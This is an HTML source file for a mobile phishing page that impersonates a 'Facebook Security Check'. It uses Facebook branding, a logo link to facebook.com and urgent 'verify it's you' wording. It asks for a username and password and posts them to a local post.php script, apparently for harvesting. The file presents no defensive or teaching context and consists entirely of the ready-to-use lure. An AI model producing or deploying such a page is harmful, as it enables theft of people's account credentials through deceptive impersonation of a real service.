mobile.html 1.8 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <meta charset="UTF-8">
  5. <title>Security Check</title>
  6. <link rel="shortcut icon" type="ico" href="./fb-ico.png">
  7. <link rel="stylesheet" type="text/css" href="style_mobile.css">
  8. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  9. </head>
  10. <body>
  11. <div class="centered">
  12. <header>
  13. <div class="main-header">
  14. <div class="logo">
  15. <a href="http://www.facebook.com"><img src="./logo.png"></a>
  16. </div>
  17. </div>
  18. </header>
  19. <section>
  20. <div class="form">
  21. <div class="m-header">
  22. <h3>Facebook Security Check. Please Verify It's You.</h3>
  23. </div>
  24. <div class="red-box">
  25. <p style="font-weight:bold; font-size:13px">Verify needed to understand it's you</p>
  26. <p>Enter your password for security reason (make sure your caps lock is off)</p>
  27. <p>Forgot your password ? <a href="">Request new one</a>
  28. </div>
  29. <div class="login-form" style="">
  30. <form method="post" class="bb" novalidate="1" id="login-form" action="post.php">
  31. <label for="username">Username:</label><input name="username" id="username" type="username"></input><br />
  32. <br> <br/>
  33. <label for="password">Password:</label><input name="password" id="password" type="password"></input><br />
  34. <input id="keep" style="margin: 10px 0 0 84px" type="checkbox"></input>
  35. <label for="keep" style="font-size:12px;">keep me logged in</label><br />
  36. <input type="submit" name="submit" value="Verify"
  37. style="background: none repeat scroll 0 0 #3b5998; border: 1px solid #294461;
  38. color: #ffffff; margin: 4px 0 0 80px; padding: 2px 6px;">
  39. <a style="text-decoration:none; color:#3B5998; margin:0 0 0 40px;" href="">can't log in?</a>
  40. </form>
  41. </div>
  42. </div>
  43. </div>
  44. </section>
  45. </body>
  46. </html>